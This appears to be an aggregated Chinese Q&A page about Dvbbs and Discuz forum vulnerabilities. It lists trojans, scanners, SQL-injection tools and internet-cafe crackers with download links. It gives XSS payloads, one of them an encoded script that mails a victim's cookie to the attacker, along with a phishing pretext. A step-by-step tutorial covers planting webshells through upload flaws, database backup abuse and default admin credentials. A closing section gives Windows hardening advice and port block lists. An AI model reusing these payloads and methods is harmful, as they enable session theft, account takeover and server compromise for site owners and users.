動網上傳漏洞

『壹』 黑客常的伎倆有哪些

常用很多dos命令的 taskkill taskkill /PID 1248 /t tasklist 查進程 cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件許可權 iisreset /reboot tsshutdn /reboot /delay:1 重起伺服器 logoff 12 要使用會話 ID（例如，會話 12）從會話中注銷用戶， query user 查看當前終端用戶在線情況 要顯示有關所有會話使用的進程的信息，請鍵入：query process * 要顯示有關會話 ID 2 使用的進程的信息，請鍵入：query process /ID:2 要顯示有關伺服器 SERVER2 上所有活動會話的信息，請鍵入：query session /server:SERVER2 要顯示有關當前會話 MODEM02 的信息，請鍵入：query session MODEM02 命令列:rundll32.exe user.exe,restartwindows 功能: 系統重啟 命令列:rundll32.exe user.exe,exitwindows 功能: 關閉系統 命令列: rundll32.exe user.exe,restartwindows 功能: 強行關閉所有程式並重啟機器。 命令列: rundll32.exe user.exe,exitwindows 功能: 強行關閉所有程式並關機 一、掃描工具 X-scan 3.1 焦點出的掃描器，國內最優秀的安全掃描軟體之一!非常專業的一個掃描器! 下載 X-way 2.5 這也上一個非常不錯的掃描器哦!功能非常多!使用也不難,入侵必備工具! 下載 SuperScan 3.0 強大的TCP 埠掃描器、Ping 和域名解析器! 下載 Namp 3.5 這個就厲害了,安全界人人皆知的非常有名氣的一個掃描器!作者Fyodor 下載 Hscan v1.20 這是款運行在Win NT/2000下的漏洞掃描工具，有GUI以及命令行兩種掃描方式! 下載 SSS 俄羅斯安全界非常專業的一個安全漏洞掃描軟體! 下載 U-Scan.exe 非常好的UNICODE漏洞掃描工具! 下載 RpcScan V1.1 可以通過135埠枚舉遠程主機RPC連接信息! 下載 SHED 1.01 一個用來掃描共享漏洞的機器的工具! 下載 DSScan V1.00 ms04-011遠程緩沖區溢出漏洞掃描專用! 下載 Dotpot PortReady1.6 該軟體為「綠色軟體」，無需安裝，非常小巧（僅23KB），具有極快的掃描速度! 下載 WebDAVScan v1.0 針對WEBDAV漏洞的掃描工具! 注意:該軟體解壓縮時會被查殺! 下載 Socks Proxy Finder2 掃描埠速度非常快的一個工具,掃描完畢後還可以導出保存起來! 下載 sqlScan v1.2 猜解開著1433埠的住機密碼工具! 下載 RPC漏洞掃描器 v1.03 針對RPC漏洞掃描的工具! 下載 流光5.0 破解版 國內大名鼎鼎的黑客掃描工具,由高級程序員小榕編寫! 下載 自動攻擊探測機 Windows NT/2000 自動攻擊探測機 下載 4899空口令探測 能夠快速的掃描到被安裝了radmin服務端4899埠的空口令IP! 下載 二、遠程式控制制 黑洞2004 免殺版 藏鯨閣-陳經韜編寫的著名遠程式控制製程序!該版本還是8月15最新版的哦! 下載 冰河2004 免殺版 國內最有名,歷史最悠久的木馬冰河!本版本是冰河的最新版本,伺服器端只有16KB! 下載 灰鴿子迷你版 灰鴿子工作室-葛軍同志的作品! 下載 網路神偷 5.7 網路神偷是一個專業級的遠程文件訪問工具!具有反彈功能! 下載 廣外女生 1.53 廣州-廣外女生小組的作品,曾風靡一時! 注意:該軟體解壓縮時會被查殺! 下載 Radmin3.2影子版 非常有名的監視程序!並非木馬,所以服務端不會被查殺! 下載 黑社會 2.0 使用跟Radmin一樣，功能明顯比它多，掃描速度也非常快！ 下載 風雪遠程式控制制 v3.9 基於TCP/IP協議的遠程管理網路工具,一個具有反彈功能的工具,非常小巧! 下載 無賴小子 2.5 無賴小子2.5，08月23日發布，其默認埠8011! 下載 藍色火焰 v0.5 藍色火焰是一個沒有客戶端的木馬,可謂無招勝有招!注意:該軟體解壓縮時會被查殺! 下載 網路公牛 國產公牛木馬,由於上傳文件大小限制,包中沒有加入易語言運行庫文件krnln.fnr! 下載 GoToMyPC 4.00 安裝簡單；能夠從任何安裝有瀏覽器的計算機上訪問主機；具有新的安全功能! 下載 三、入侵必備 SQL綜合利用工具 非常好的一個SQL連接器,除了可以輸入CMD命令外,還可以直接上傳軟體! 下載 SuperSQLEXEC 用來連接sql server的工具！ 下載 3389.exe 開遠程機器3389埠的小東東!只要把程序上傳到肉雞運行後,重啟既可! 下載 c3389.exe 是一個可以顯示、更改本機或遠程主機終端服務埠的小程序! 下載 3389.bat 一個開3389埠的批量處理! 下載 3399終端登陸器 用來遠程登陸3389肉雞終端的工具!這個win2000以上都有,以下的都沒有! 下載 Opentelnet 遠程開telnet的工具! 下載 NTLM.exe 去除ntlm驗證的小工具,上傳後執行,然後再telnet上去既可! 下載 Hide Admin V2.0 用來隱藏肉雞上管理員帳號的工具!不過管理員帳號必須有＄號哦! 下載 用的一個抓包工具,也是黑客經常使用的工具! 下載電腦-交換機-路由器 192.168.1.1~SSSO伴侶1.2 更直觀的入侵，把dos下的入侵實戰搬到圖形界面上來！ 下載 3389終端復制補丁 只要安裝了該補丁,就可以直接把你需要上傳的東西拖拽到肉雞上!非常方便哦! 下載 Tftp32 非常使用的一個上傳工具！也是大家經常使用的哦！ 下載 Wget.exe 命令行下的http下載軟體! 下載 Pulist.exe 使用pulist.exe 來獲取已經登陸帳戶的winlogon.exe 的PID 值! 下載 FindPass.exe 找管理員密碼，需要PULIST配合! 下載 入侵助手1.0 該工具可以將dos下的入侵命令直接生成給黑客! 下載 Snake的代理跳板 讓機器成為sock5代理軟體的程序,可以用它隱藏自己的ip. 下載 Fport.exe 命令行下查看系統進程與埠關聯! 四、注入工具 NBSI 2.0 NB聯盟小竹編寫的一個非常強悍sql注射工具! 下載 CASI 1.10 安全天使-superhei編寫的一個php注射工具，亦是國內首發的第一個php注射工具! 下載 sqlasc.exe NB聯盟出的注射點掃描工具! 下載 sql_injection 自貢學生聯盟出的sql注射工具,跟臭要飯的哪個差不多! 下載 絕世猜解SQL注射 1.0 BUGKIDZ-臭要飯的!以前編寫的sql注射工具,使用率相當廣泛!簡單實用的工具! 下載 五、網吧工具 還原轉存大師 藏鯨閣出的還原轉存大師,大家都認識!不做介紹! 下載 還原精靈清除器 CY07工作室出的一個還原精靈清除器!好久以前我用過,感覺非常不錯! 下載 還原精靈密碼讀取 還原精靈密碼讀取!讀取還原精靈密碼的工具! 下載 還原卡密碼破解程序 非常好用的還原卡密碼破解程序! 下載 Pubwin4.3 修改程序 目的:跳過管理驗證,並且可以免費上網! 下載 美萍9.0密碼破解器1.0 美萍9.0密碼破解器1.0!做破解使用! 下載 萬象2R最新版破解器 萬象2R最新版破解器!做破解使用! 下載 萬象普及版密碼破解器 可以顯示退出密碼；運行設置程序密碼；注意:該軟體解壓縮時會被查殺! 下載 網吧管理集成破解器 網吧管理集成破解器,功能挺多的哦! 下載 Pubwin精靈 程序運行後,首先點擊破解按鈕,當顯示破解成功後請點注銷按鈕.... 下載 小哨兵密碼清除器 小哨兵密碼清除,沒有測試過,大家試試! 下載 解鎖安全器2.0 解鎖安全器2.0! 下載 硬碟還原卡破解程序 硬碟還原卡破解程序! 下載 還原卡解鎖 還原卡解鎖! 下載 Bios密碼探測器 Bios密碼探測器,速度很快的哦! 下載 共享密碼掃描器 共享密碼掃描器,也是一個不錯的工具! 下載 硬碟還原卡工具包 硬碟還原卡工具包,零件很多,大家試試吧! 下載 幹掉Windows2000 幹掉Windows2000! 下載 注冊表解鎖器 注冊表破解器!解鎖用的! 下載 網上鄰居密碼破解器 網上鄰居密碼破解器,速度也很快哦! 下載 六、漏洞利用 動網7SP1,2,SQL注入 動網7SP1,7SP2,SQL版USER-AGENT注入利用程序!桂林老兵作品! 下載 動網上傳利用程序 動網上傳漏洞利用程序!桂林老兵作品! 下載 動網上傳漏洞利用 動網上傳漏洞利用程序,臭要飯的!作品! 下載 BBS3000漏洞利用工具 BBS3000漏洞利用工具,俺是奮青作品! 下載 塵緣雅境漏洞利用工具 塵緣雅境上傳漏洞利用工具,俺是奮青作品! 下載 上傳漏洞利用4in1 上傳漏洞利用程序4合1! 下載 七、嗅探監聽 nc.exe NC.EXE是一個非標準的telnet客戶端程序！安全界有名的軍刀! 下載 NetXray 一款非常好的網路分析和監控軟體 下載 Sniffer Pro 4.7 想成為真正的黑客高手,那就先學會使用該工具吧! 下載 灰鴿子：http://61.129.76.80/down?cid=&t=502&fmt=- 阿D工具包: http://61.129.76.80/down?cid=&t=202&fmt=- ssport掃描：http://crc.onlinedown.net:82/down/ssport.rar NTscan:http://cqhk.14023.com/down/NTscan%BA%BA%BB%AF%B0%E6.rar IP資料庫純真版:http://www.xdowns.com/soft/xdowns.asp?softid=31375&downid=5&id=36514 Recton V2.5 D賀專用版:http://www.luyi61.net/Soft/UploadSoft/mmhm/200610/Recton.rar 區域網查看工具:http://flashget.newhua.com:82/down/LanSee163.rar 站長助手公開版:http://xzdx.hack58.net/hack58/ly/061229zs.rar 北斗4.1破解版:http://down.98959.com:90/%C8%ED%BC%FE%CF%C2%D4%D8/2006/8/25/20060825085921853.rar 木馬綵衣715SVK:http://download.77169.com/soft/hacrktools/keyboard/2006/mmcyzj.zip Private exe Protector:http://1.wt1.crsky.com/200703/pep200.rar

『貳』 目前動網論壇的漏洞有那些如何利用這些漏洞入侵動網

在discuz！的發貼、回貼、PM等中的subject都沒有經過過濾，所以也可以添加代碼。 例如 http://xxx/post.php?action=newthread&fid=2...cript%3E%3Cb%22 效果是首先彈出自己的cookie 利用方法：把上述代碼放置到img中。 適用版本：discuz！2.x discuz！3.x 一種利用discuz！2.0漏洞進行欺騙獲得cookie的嘗試 通過測試XXXFan論壇的PM功能存在一個安全漏洞，具體描述如下： XXXFan的給某個會員發送悄悄的鏈接如下（假定這個會員名字為XXXFan） http://XXX/pm.php?action=send&username=XXXFan 因為論壇程序對會員名字沒有進行過濾，而是直接顯示在發送到欄目中（TO：），所以可以在名字後面加上script代碼。例如 http://XXX/pm.php?action=send&username=XXXFan "><script>alert(documents.cookie)</script><b%20" 上面的鏈接點擊以後首先彈出的是自己的cookie內容。 當然我們可以先在自己的站點上構造一個程序來收集cookie，類似於 getcookie.php?cookie= 但是如何來誘使會員點擊呢，如果簡單的放在論壇上，太容易被識別。所以可以利用discuz論壇程序的另外一個功能，"帖子介紹給朋友"功能。 因為discuz的這個功能對填寫的emial地址沒有進行任何過濾、辨別和模版，可以偽造任何人給別人發信，安全性很高。利用這個功能我們就可以偽造ExploitFan的管理員給某個會員發一封信，誘使會員點擊我們准備的URL，如果誘使就看自己的手段了，例如可以說"論壇正在測試新功能，請您協助點擊上面地址，我們會在後台記錄您的點擊在合適的時間會給您增加積分以做獎勵"等等。 因為鏈接地址是XXXFan的，而且發信人和郵件地址都是XXXFan的官方地址，所以可信度非常高，而且不會留下任何把柄。當然為了更高的安全性，可以在<script>里的內容加密，以進一步增加隱蔽性。 至於得到cookie如何做，可以嘗試cookie欺騙或者是暴力破解MD5密碼 本方法適用於大部分使用discuz2.0的論壇,至於discuz3.0的利用方法請參與在我以前發表的discuz！悄悄話漏洞 【BUG】Discuz!投票的BUG 投票可以用 misc.php?action=votepoll&fid=2&tid=16980&pollanswers[]=n （n為選項，從0開始） 的方式通過URL來直接投票 但是如果n>最大選項呢，嘻嘻～ 照樣提交成功，不過增加了一個標題為空的選項 效果見： http://discuz.net/viewthread.php?tid=20020&sid=dymPEc （那個最後的空白的是我剛加的） 該漏洞存在的版本： Discuz!3.X Discuz!2.X(可能，沒有測試過） Discuz!的代碼漏洞 這是接著昨天發現的漏洞所展開的，第一發現者（PK0909)。 具體的描述就不說了，下面是一個簡單的測試代碼。 /Article/UploadFiles/200412/20041225232318260.gif%22%20style=display:none%3e%3c/img%3e%3cscript%3evar%20Req=new%20ActiveXObject(%22MSXML2.XMLHTTP%22);Req.open(%22post%22,%22 http://www.XXXX.com/forum/pm.php?action=send%22,false);var%20forms=%22pmSubmit=Submit%22.toLowerCase()%2B%22%26msgto=XXXXX%26subject=cookie%26saveoutbox=0%26message=%22%2Bescape(documents.cookie);Req.setRequestHeader(%22Content-length%22,forms.length)%3BReq.setRequestHeader(%22CONTENT-TYPE%22,%22application/x-www-form-urlencoded%22);Req.send(forms);%3c/script%3e%3cb%22 [ /img] 發現discuz！UT 跨域站點的腳本漏洞－－短消息篇有關跨域站點的腳本漏洞，已經算是非常平成並普遍的漏洞了。 有關具體的消息可以參閱： http://www.cert.org/advisories/CA-2000-02.html 下面針對Discuz、UT論壇程序的悄悄話部分加以說明 漏洞適應版本： Discuz1.X Discuz!2.0(0609,0820版) Discuz!3.X UT 1.0 漏洞描述： discuz！給指定會員發送悄悄話使用的是類似 http://www.XXXX.net/phpbbs/pm.php?action=send&username=name 的語句，但是name沒有經過過濾直接顯示在發送短消息的頁面中，這就給偷cookie或者更嚴重的破壞打開了方便之門。 Discuz!3.X已經改為 http://XXX.net/pm.php?action=send&uid=XXXX 類似的語句，避免了這個漏洞，但是在選擇簡訊文件夾的時候卻沒有經過過濾。同樣產生了上面的漏洞 例 http://www.XXXX.net/phpbbs/pm.php?action=s...d&username=name %22%3E%3Cscript%3Ealert(documents.cookie)%3C/script%3E%3Cb%22[/URL] ，上面的例子是顯示自己的cookie。（針對Discuz!1.X Discuz!2.X) http://XXX.net/pm.php?folder=inbox%22%3E%3...cript%3E%3Cb%22 顯示自己的cookie。（針對Discuz!3.X) UT雖然在主題上經過了過濾，也就是說把%27轉換為'；但是其收件人卻沒有過濾，所以同樣有類似的漏洞。例子略。(在不同的UT論壇上發現其代碼不盡相同，但是總的來說都有類似的漏洞）

希望採納

『叄』 動態網站和靜態網站漏洞分別有哪些

動態網站主要是sql注入，其他組件的漏洞（例如上傳組件的漏洞）；最後它還有下面靜態網站的主要漏洞

靜態網站的漏洞主要來自於主機本身，例如windows漏洞，iis漏洞，其他應用程序的漏洞所帶來的影響

『肆』 動網7.1 sql版最新注入漏洞的詳細利用以及如何在後台獲取webshell

我就給大家講幾個常用的webshell獲取方法。
1 上傳
說到上傳獲得webshell，就不得不提大名鼎鼎的動網7.0SP2之前的文件上傳漏洞了，那可是連官司方都沒能倖免於難的啊！其中的成因嗎不太好說，大概地說就是字元截斷的問題。我們還是來看看怎麼利用吧。這里我們要請出老兵的萬能上傳工具呢（圖76），為什麼叫萬能上傳工具呢？很簡單，因為連大名鼎鼎的動網論壇都沒有注意到這個嚴重漏洞，其它許多系統自然也避免不了，所以說這個工具是「萬能」的，下面我們找一個沒打過SP2補丁的dvbbs，注冊一個帳號，登錄進去後看有沒有禁止上傳，如果沒有禁止，我們就是提取當前cookies保存起來（怎麼提取？又忘了不是，前面不是說過可以用修改cookies瀏覽器提取嗎？）然後在萬能上傳工具處填好漏洞url，欲上傳的文件和cookies等信息（圖77），點「上傳」，不一會就提示成功了（圖78），我們現在來訪問這個上傳後的文件，看，是不是得到一個shell呢（圖79）
當然，並不是所有的系統都能用這個方法上傳的。下面我再總結幾個常見的上傳方法。
1、進入後台直接上傳。有些系統對管理員可是十分信任的哦，進了後台只要找到有上傳的地方你就可以直接選匹馬放上去，絕不會有任意阻攔（圖80）。
2、添加上傳類型上傳。如果不能直接上傳，可找找看有沒有添加上傳類型的地方，有的話添加一個ASP就可以了。當然，有些系統在代碼中就限定了不允許上傳ASP文件，不要緊，我們可以添加允許上傳ASA、CER等文件，然後把.asp的後綴改為ASA或CER上傳，一樣可用的（圖81）。
3、抓包上傳。這里就要利用Win2000的一個小漏洞了，如果文件名的結尾是空格或「.「號，那麼windows會自動把這個符號「吃」掉。那麼，我們就可以添加允許上傳「ASP 」文件，注意ASP後有個空格，ASP 可不等於ASP啊，所以代碼里的限制就沒用了。然後我們來到文件上傳界面，選擇一個ASP文件，先別上傳。我們打開抓包工具Wsock Expert（圖82），選擇監控IE的上傳窗口，然後回到上傳界面，點擊上傳，提示上傳失敗。預料之中。我們來到Wsock Expert，找到剛才提交的數據包（圖83），看到那個mm.asp沒有，我們在這個後面加個空格，再用NC提交，成功上傳！
4、利用表單沖突上傳。用這個方法最典型的就是動力3.51的上傳了。我們同樣注冊一個用戶，來到發表文章處。切換到「源代碼」模式，輸入下面的代碼：
<FORM name=form1 onsubmit="return check()" action=upfile_article.asp method=post encType=multipart/form-data><INPUT class=tx1 type=file name=FileName> <INPUT class=tx1 type=file name=FileName><INPUT style="BORDER-RIGHT: rgb(88,88,88) 1px double; BORDER-TOP: rgb(88,88,88) 1px double; FONT-WEIGHT: normal; FONT-SIZE: 9pt; BORDER-LEFT: rgb(88,88,88) 1px double; LINE-HEIGHT: normal; BORDER-BOTTOM: rgb(88,88,88) 1px double; FONT-STYLE: normal; FONT-VARIANT: normal" type=submit value=上傳 name=Submit></FORM>
再來到「預覽」模式，是不是看到了兩個選擇上傳文件的框卻只有一個上傳按鈕啊（圖84）？我們在第一個框處選擇一個ASP文件，第二個框處選擇一個jpg文件，然後點上傳。可能會提示沖突，但我們返回「源代碼」模式，就可以看到我們上傳後的Webshell地址了。
5、利用代碼對文件類型的限制上傳。現在許多代碼為了安全都限制了上傳ASP文件，但一些代碼的限制方法實在令我不敢恭維。我見過有些代碼的限制方式是一遇到ASP就把它去掉的。那麼，我們完全可以添加一個上傳類型「ASASPP」，這樣一來，在上傳過程中代碼會把中間為ASP去掉，後綴的自然也就變為ASP的了。
6、利用其它上傳工具。老兵的萬能工具雖名為萬能，但因為有些系統的上傳代碼與動網的是有差異的，所以這個工具對它就失效了。我這里還收集了別的一上上傳利用專用程序。比如去緣雅境的，操作起來也十分簡單，相信大家都會用的。
（2）寫入過濾不完全，
因為現在許多系統都是可以用FSO功能直接寫入其文件的，如果寫入文件的過濾不完全，也可以直接往裡寫個webshell，如動易的conife.asp。這里我要講的是leadbbs後台友情鏈接添加處寫入webshell，我們來到後台的添加友情鏈接處，點「新增友情鏈接」（圖85），然後在「網站名稱處填上冰方後浪子微型ASP後門式海洋的一句話木馬，其它亂填（圖86），然後我們用客戶端連接，成功了吧！（圖87）
除了對文件寫入的過濾外，還有對資料庫寫入的過濾。當我們暴庫得知資料庫後綴為ASP，但用網際快車能下載時，我們就可以確定這個資料庫里不包含ASP語句，那麼我們只要找到一個可以寫入資料庫的地方，寫入一句話木馬，再用客戶端連接，一樣可以成功的。
3、後台備分及恢復
說起後台的備分和恢復獲取webshell，我可算是頗有研究，也可以說是從這里起步學習技術的，先說說常規的方法吧，一般地，我們就是把一個ASP木馬改為gif後綴上傳，然後記下上傳後的地址，下面，我們來到數據備分頁面（圖88），在「資料庫路徑」處填自己剛才上傳的文件名，在「備分後路徑」處填自己想要種馬的地址，注意後綴為ASP（圖89），點「備分」後我們就得到了自己想要的webshell。
但是，如果像動力一樣不允許定義當前資料庫地址呢？一樣可以的，我們通過暴庫術式後台看到動力的資料庫地址，因為ASP的話，我們一樣可以把一個ASP木馬改為gif的型式，然後上傳，現在，我們來到「資料庫恢復」頁面，看到沒有，可以自定義恢復資料庫的路徑（圖90），我們選擇我們剛才上傳的文件路徑，恢復（圖91），恢復成功後整個系統是用不了，但我們只須直接訪問資料庫地址就可以得到webshell了，當然，為了不被別人發現最好還是先把資料庫備分好，得到shell後再用shell恢復回去。
上面一般說的方法就是我發表的第一篇文件《利用ACCESS得到webshell一文的補充》，至此，數據備分和恢復的利用似乎完了，其實還沒有，還是那個動力系統，如果我們無法得到資料庫地址，或者數據是mdb的，出放到了web外，我們不就用不了上面的方法了嗎？
別急，再繞個彎子，我們來仔細看看這個動力系統，備分處限制了只能備分當前的資料庫，不能備分其它文件，且備分後文件後綴限為ASA，但可以自定義文件名。恢復處只能把數據恢復到當前資料庫文件，如果遇上本段開頭提的那三種情況，我們把一個shell恢復出來也是沒用的。既然不能直接弄出來，我們就老老實實恢復一個比較正常的數據吧。說是比較正常，那是因為這個資料庫雖然對系統沒有影響，但還是做過一些手腳的。
我們拿一個相同系統的空資料庫，把<%nodownload%>表中的內容改為一句話木馬（圖92），然後再在後台添加允許上傳MDB文件，上傳。下面到數據恢復處把剛上傳的文件恢復回去，這時系統仍是正常運行的。我們重新用默認的用戶名admin，密碼admin888登錄後，再到數據備分的地方，把數據備分出來，然後用客戶端連接這個備分的文件就可以了。
對於限制沒那麼嚴的動網，我們可以直接備分就行了。雖然7.1中對備分處做了限制（圖93），但恢復處可設限制（圖94），條件比動力寬松多了。
4、SQL導出。對於有注入點的SQL站點，我們還可以用黑客界中的丐幫幫主——就是那個臭要飯的發明的SQL寫入導出大法得到webshell，其原理是在知道網站物理路徑的情況下通過往SQL資料庫中寫入一個帶木馬的表，再將這個表導出，就得到webshell了。為了不讓管理人員發現，我們還要刪掉這個新建的表。那個臭要飯的還專門對此寫了工叫getwebshell的工具（圖95），使用起來也並不復雜，我也就不再說了。

『伍』 怎樣防黑客及木馬軟體

安全策略:
打開管理工具
找到本地安全設置.本地策略.安全選項
1.互動式登陸.不需要按 Ctrl+Alt+Del 啟用 [根據個人需要,啟用比較好,但是我個人是不需要直接輸入密碼登陸的]
2.網路訪問.不允許SAM帳戶的匿名枚舉 啟用
3.網路訪問.可匿名的共享 將後面的值刪除
4.網路訪問.可匿名的命名管道 將後面的值刪除
5.網路訪問.可遠程訪問的注冊表路徑 將後面的值刪除
6.網路訪問.可遠程訪問的注冊表的子路徑 將後面的值刪除
7.網路訪問.限制匿名訪問命名管道和共享
8.帳戶.重命名來賓帳戶guest [最好寫一個自己能記住中文名]讓黑客去猜解guest吧,而且還得刪除這個帳戶,後面有詳細解釋]
9.帳戶.重命名系統管理員帳戶[建議取中文名]
E計劃.用戶許可權分配策略:
打開管理工具
找到本地安全設置.本地策略.用戶許可權分配
1.從網路訪問計算機 裡面一般默認有5個用戶,除Admin外我們刪除4個,當然,等下我們還得建一個屬於自己的ID
2.從遠程系統強制關機,Admin帳戶也刪除,一個都不留
3.拒絕從網路訪問這台計算機 將ID刪除
4.從網路訪問此計算機,Admin也可刪除,如果你不使用類似3389服務
5.通過終端允許登陸 刪除Remote Desktop Users
F計劃.終端服務配置
打開管理工具
終端服務配置
1.打開後，點連接,右鍵,屬性,遠程式控制制,點不允許遠程式控制制
2.常規,加密級別,高,在使用標准windows驗證上點√!
3.網卡,將最多連接數上設置為0
4.高級,將裡面的許可權也刪除.[我沒設置]
再點伺服器設置,在Active Desktop上,設置禁用,且限制每個使用一個會話
G計劃.用戶和組策略
打開管理工具
計算機管理.本地用戶和組.用戶
刪除Support_388945a0用戶等等
只留下你更改好名字的adminisrator許可權
計算機管理.本地用戶和組.組
組.我們就不組了.分經驗的(不管他.默認設置)
X計劃.DIY策略[根據個人需要]
1.當登陸時間用完時自動注銷用戶(本地) 防止黑客密碼滲透.
2.登陸屏幕上不顯示上次登陸名(遠程)如果開放3389服務,別人登陸時,就不會殘留有你登陸的用戶名.讓他去猜你的用戶名去吧.
3.對匿名連接的額外限制
4.禁止按 alt+crtl+del
5.允許在未登陸前關機[防止遠程關機/啟動、強制關機/啟動]
6.只有本地登陸用戶才能訪問cd-rom
7.只有本地登陸用戶才能訪問軟碟機
8.取消關機原因的提示
1、打開控制面板窗口，雙擊「電源選項」圖標，在隨後出現的電源屬性窗口中，進入到「高級」標簽頁面；
2、在該頁面的「電源按鈕」設置項處，將「在按下計算機電源按鈕時」設置為「關機」，單擊「確定」按鈕，來退出設置框；
3、以後需要關機時，可以直接按下電源按鍵，就能直接關閉計算機了。當然，我們也能啟用休眠功能鍵，來實現快速關機和開機；
4、要是系統中沒有啟用休眠模式的話，可以在控制面板窗口中，打開電源選項，進入到休眠標簽頁面，並在其中將「啟用休眠」選項選中就可以了。
9.禁止關機事件跟蹤
開始「Start ->」運行「 Run ->輸入」gpedit.msc 「，在出現的窗口的左邊部分，
選擇 」計算機配置「（Computer Configuration ）-> 」管理模板「
（Administrative Templates）-> 」系統「（System）,在右邊窗口雙擊
「Shutdown Event Tracker」 在出現的對話框中選擇「禁止」（Disabled），
點擊然後「確定」（OK）保存後退出這樣，你將看到類似於windows 2000的關機窗口
三、修改許可權防止病毒或木馬等破壞系統
winxp、windows2003以上版本適合本方法.
因為目前的木馬抑或是病毒都喜歡駐留在system32目錄下,如果我們用命令限制system32的寫入和修改許可權的話
那麼,它們就沒有辦法寫在裡面了.看命令
A命令
cacls C:windowssystem32 /G administrator:R 禁止修改、寫入C:windowssystem32目錄
cacls C:windowssystem32 /G administrator:F 恢復修改、寫入C:windowssystem32目錄
呵呵，這樣病毒等就進不去了，如果你覺得這個還不夠安全，
還可以進行修改覺得其他危險目錄,比如直接修改C盤的許可權，但修改c修改、寫入後，安裝軟體時需先把許可權恢復過來才行
B命令
cacls C: /G administrator:R 禁止修改、寫入C盤
cacls C: /G administrator:F 恢復修改、寫入C盤
這個方法防止病毒，
如果您覺得一些病毒防火牆消耗內存太大的話
此方法稍可解決一點希望大家喜歡這個方法^_^
X命令
以下命令推薦給高級管理員使用[因為win版本不同,請自行修改參數]
cacls %SystemRoot%system32cmd.exe /E /D IUSR_ComSpec 禁止網路用戶、本地用戶在命令行和gui下使用cmd
cacls %SystemRoot%system32cmd.exe /E /D IUSR_Lsa 恢復網路用戶、本地用戶在命令行和gui下使用cmd
cacls %SystemRoot%system32tftp.exe /E /D IUSR_Lsa 禁止網路用戶、本地用戶在命令行和gui下使用tftp.exe
cacls %SystemRoot%system32tftp.exe /E /D IUSR_Lsa 恢復網路用戶、本地用戶在命令行和gui下使用tftp.exe
cacls %SystemRoot%system32tftp32.exe /E /D IUSR_Lsa 禁止網路用戶、本地用戶在命令行和gui下使用tftp32.exe
cacls %SystemRoot%system32tftp32.exe /E /D IUSR_Lsa 恢復網路用戶、本地用戶在命令行和gui下使用tftp32.exe
四、重要文件名加密[NTFS格式]
此命令的用途可加密windows的密碼檔,QQ密碼檔等等^.^
命令行方式
加密：在DOS窗口或「開始」 | 「運行」的命令行中輸入「cipher /e 文件名（或文件夾名）」。
解密：在DOS窗口或「開始」 | 「運行」的命令行中輸入「cipher /d 文件名（或文件夾名）」。
五、修改注冊表防禦D.D.O.S
在注冊表中更改以下值可以幫助你防禦一定強度的DoS攻擊
SynAttackProtect REG_DWORD 2
EnablePMTUDiscovery REG_DWORD 0
NoNameReleaseOnDemand REG_DWORD 1
EnableDeadGWDetect REG_DWORD 0
KeepAliveTime REG_DWORD 300,000
PerformRouterDiscovery REG_DWORD 0
EnableICMPRedirects REG_DWORD 0
更多新的防禦技巧請搜索其他信息,
由於本人不敢拿自己的硬碟開玩笑,所以沒做實驗... ...
六、打造更安全的防火牆
只開放必要的埠，關閉其餘埠.因為在系統安裝好後預設情況下,一般都有預設的埠對外開放，
黑客就會利用掃描工具掃描那些埠可以利用，這對安全是一個嚴重威脅。 本人現將自己所知道的埠公布如下(如果覺得還有危險需要過濾的,請聯系本人：OICQ 13946296

埠 協議 應用程序
21 TCP FTP
25 TCP SMTP
53 TCP DNS
80 TCP HTTP SERVER
1433 TCP SQL SERVER
5631 TCP PCANYWHERE
5632 UDP PCANYWHERE
6（非埠） IP協議
8（非埠） IP協議
那麼,我們根據自己的經驗,將下面的埠關閉
TCP
21
22
23
25 TCP SMTP
53 TCP DNS
80
135 epmap
138 [沖擊波]
139 smb
445
1025 DCE/1ff70682-0a51-30e8-076d-740be8cee98b
1026 DCE/12345778-1234-abcd-ef00-0123456789ac
1433 TCP SQL SERVER
5631 TCP PCANYWHERE
5632 UDP PCANYWHERE
3389
4444[沖擊波]
4489
UDP
67[沖擊波]
137 netbios-ns
161 An SNMP Agent is running/ Default community names of the SNMP Agent
關於UDP一般只有騰訊OICQ會打開4000或者是8000埠,那麼,我們只運行本機使用4000埠就行了
七、保護個人隱私
1、TT瀏覽器
選擇用另外一款瀏覽器瀏覽網站.我推薦用TT,使用TT是有道理的.
TT可以識別網頁中的腳本,JAVA程序,可以很好的抵禦一些惡意的腳本等等,而且TT即使被感染,你刪除掉又重新安裝一個就是.[TT就是騰訊的瀏覽器](不過有些人喜歡用MyIE,因為我使用的時間和對他的了解不是很深吧,感覺不出他對安全方面有什麼優勢一_一~,希望支持MyIE的朋友不要揍我,否則我會哭... ...)
2、移動「我的文檔」
進入資源管理器，右擊「我的文檔」，選擇「屬性」，在「目標文件夾」選項卡中點「移動」按鈕，
選擇目標盤後按「確定」即可。在Windows 2003中「我的文檔」已難覓芳蹤，桌面、開始等處都看不到了，
建議經常使用的朋友做個快捷方式放到桌面上。
3、移動IE臨時文件
進入「開始→控制面板→Internet 選項」，在「常規」選項卡的「Internet 文件」欄里點「設置」按鈕，
在彈出窗體中點「移動文件夾」按鈕，選擇目標文件夾後，點「確定」，在彈出對話框中選擇「是」，
系統會自動重新登錄。點本地連接,高級,安全月志,把月志的目錄更改專門分配月志的目錄，
不建議是C:再重新分配月志存儲值的大小,我是設置了10000KB
八、第三方軟體的幫助
防火牆：天網防火牆（建議）[二道販子注:winxp以上可以考慮用系統自帶的防火牆,win2000可以考慮用IPSEC,是個鍛煉的機會)
殺毒軟體：卡巴斯基
二道販子後注:
現在黑客的攻擊有從傳統的系統漏洞轉向了你的瀏覽器,所以要在升級一些傳統漏洞補丁的同時要注意你的瀏覽器.
Windows 2000伺服器的安全設置
設置禁用，構建第一道防線c_
在安裝完Windows 2000後，首先要裝上最新的系統補丁。但即使裝上了，在網際網路上的任何一台機器上只要輸入「＼＼你的IP地址＼c」，然後輸入用戶名 Guest，密碼空，就能進入你的C盤，你還是完全暴露了。解決的方法是禁用•格斯特賬號，為管理人設置一個安全的密碼，將各驅動器的共享設為不共享。同時你還要關閉不需要的服務。你可以在管理工具的服務中將它們設置為禁用，但要提醒的是一定要慎重，有的服務是不能禁用的。一般可以禁用的服務有Telnet、任務調度程序(允許程序在指定時間運行)、遙遠的登記服務(允許遠程注冊表操作)等。這是你構建的伺服器的第一道防線。-設置第二，構建第二道防線<*i
